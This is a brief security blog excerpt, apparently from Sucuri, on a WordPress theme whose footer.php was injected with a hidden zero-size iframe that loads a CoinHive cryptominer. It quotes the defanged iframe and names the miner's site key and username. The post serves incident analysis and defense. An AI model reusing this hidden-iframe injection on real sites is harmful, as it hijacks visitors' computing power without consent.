Recently, a webmaster contacted us when his AVG antivirus reported that the JS:Miner-C [Trj] infection was found on their site.

Our investigation revealed a hidden iframe had been injected into the theme’s footer.php file:

<iframe src="hxxps://wpupdates.github[.]io/ping/” style=”width:0;heigh:0;border:none;”>

When we opened the URL in a browser, the page was blank.

After checking the HTML source code, we discovered a piece of JavaScript using the CoinHive miner with the site key, CZziRExmOxYEE65Hm4E9fycCuNqZH1G9 and the username, MoneroU.

Continue reading Malicious Cryptominers from GitHub at Sucuri Blog.

Via Sucuri.net